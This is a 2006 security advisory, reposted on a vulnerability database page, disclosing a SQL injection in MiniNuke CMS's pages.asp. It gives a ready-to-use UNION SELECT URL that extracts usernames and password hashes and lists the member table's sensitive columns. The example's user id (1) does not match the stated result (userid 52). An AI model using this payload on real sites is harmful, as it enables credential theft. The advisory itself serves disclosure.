Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11542
HistoryFeb 22, 2006 - 12:00 a.m.

MiniNuke CMS System all versions (pages.asp) SQL Injection

2006-02-2200:00:00
vulners.com
14
JSON

–Security Report–
Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection
vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 19/02/06 10:31 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: MiniNuke (www.mini-ex.net) (www.mininuke.info)
Version: All versions released from this vendors.
About:Via this method remote attacker can inject SQL query to the pages.asp

How&Example:
GET -> http://[site]/pages.asp?id=1%20[SQLQuery]
Example ->
http://[site]/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1
So with this example remote attacker can get userid 52's hashed password.
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar

Exploit:
http://www.nukedx.com/?getxpl=9

Original advisory:
http://www.nukedx.com/?viewdoc=9

JSON